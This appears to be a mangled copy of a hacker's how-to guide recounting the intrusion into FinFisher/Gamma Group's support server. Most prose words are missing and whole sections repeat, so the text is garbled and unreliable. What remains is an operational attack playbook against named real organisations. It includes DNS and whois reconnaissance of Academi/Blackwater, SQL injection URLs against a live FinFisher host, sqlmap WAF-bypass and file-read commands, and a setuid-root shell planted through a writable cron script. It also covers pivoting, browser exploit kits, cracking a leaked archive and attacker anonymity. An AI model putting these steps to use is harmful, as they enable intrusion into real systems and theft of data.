54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
Root on one server is rarely the end of it. The server sees networks that the internet does not, so the next step is to scan them from the inside with nmap; the NSE scripts nfs-* and smb-* are the quickest way to find open file shares. In finsupport's case the interesting neighbour was a machine called qateam, which became the next target.

What turned up, briefly: Gamma's support material and FinSpy releases, the FinSpy command-and-control software, the FinFisher C&C infrastructure, material relating to DDoS, and Gamma Group's internal documents. Gamma's support data, including which FinSpy versions had gone to which customers, was among it; the release was announced on Twitter.

Bonus for anyone with GPU time to spare: FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet link, 38.7 GB) is password-protected and has not been opened. Crack it!

This was one route in. There are others.
1) Client-side attacks: exploits for Java, Flash and Microsoft Office, delivered by email or by a link, still work because users' browsers run outdated Java and Flash plugins. Gamma itself sells such 0-days as FinSploit, bought in from VUPEN, but nothing that exotic is needed: Metasploit's browser autopwn module, loaded with old Flash exploits, gets through on a large share of desktops.

2) Social engineering, which in the author's estimate succeeds about 95% of the time.

The 40 gigabytes taken from Gamma were published together with a PGP key for contacting the author; a mirror is on GitHub: https://github.com/FinFisher .
Where to read more:

Hacker News and Reddit

https://www.pentesterlab.com/exercises/
http://overthewire.org/wargames/
http://www.hackthissite.org/
http://smashthestack.org/
http://www.win.tue.nl/~aeb/linux/hh/hh.html
http://www.phrack.com/
http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers
https://www.corelan.be/ (start with Exploit writing tutorial part 1)
http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
http://www.dest-unreach.org/socat/

Books:

The Web Application Hacker's Handbook
Hacking: The Art of Exploitation
The Database Hacker's Handbook
The Art of Software Security Assessment
A Bug Hunter's Diary
Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
 ___________
< got r00t? >
 -----------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus
WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell
chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News
Reddit
https://www.pentesterlab.com/exercises/
http://overthewire.org/wargames/
http://www.hackthissite.org/
http://smashthestack.org/
http://www.win.tue.nl/~aeb/linux/hh/hh.html
http://www.phrack.com/
http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( )
https://www.corelan.be/ ( Exploit writing tutorial part 1)
http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook
Hacking: The Art of Exploitation
The Database Hacker's Handbook
The Art of Software Security Assessment
A Bug Hunter's Diary
Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
TCP/IP Illustrated
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https:
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https:
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
